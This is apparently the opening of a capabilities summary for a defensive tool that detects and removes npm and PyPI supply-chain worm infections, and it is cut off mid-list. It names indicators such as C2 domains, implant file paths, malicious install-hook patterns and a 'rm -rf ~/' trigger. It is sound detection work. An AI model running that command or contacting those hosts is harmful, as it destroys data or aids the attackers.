culllisted

<!-- CAPABILITIES_SUMMARY: - ioc_database_match: Match local-filesystem state, process tree, lockfile pins, and git history against a curated IoC database of public supply-chain worm campaigns (Mini Shai-Hulud 1st/2nd, S1ngularity, lottie-player, etc.) - persistence_sweep: Detect OS-level persistence — macOS LaunchAgent (`~/Library/LaunchAgents/`), Linux systemd user units (`~/.config/systemd/user/`), Windows scheduled tasks, and cross-platform IDE-hook implants (`.claude/settings.json|setup.mjs|router_runtime.js`, `.vscode/tasks.json|setup.mjs`, `.github/workflows/codeql_analysis.yml`) - lockfile_pin_check: Scan `package-lock.json` / `pnpm-lock.yaml` / `yarn.lock` / `requirements.txt` / `Pipfile.lock` / `Gemfile.lock` for known-bad versions and resolved tarball URLs - optional_dependencies_audit: Flag `optionalDependencies` referencing `github:<owner>/<repo>#<commit>` orphan commits and `prepare` / `postinstall` lifecycle scripts that fetch and execute remote code - exfil_trace_match: Detect outbound traces to known C2 hosts (`git-tanstack[.]com`, `api[.]masscan[.]cloud`), Session Protocol seed nodes, and GitHub anomaly patterns (auto-created `{dune_word}-{dune_word}-{3-digit}` repos, `createCommitOnBranch` mutations, `chore: update dependencies` commits from unknown authors) - safe_eradication_orchestration: Generate ordered removal runbook — **stop persistence first** (so `gh-token-monitor` cannot fire `rm -rf ~/` on token-revoke detection), then delete dropped files, then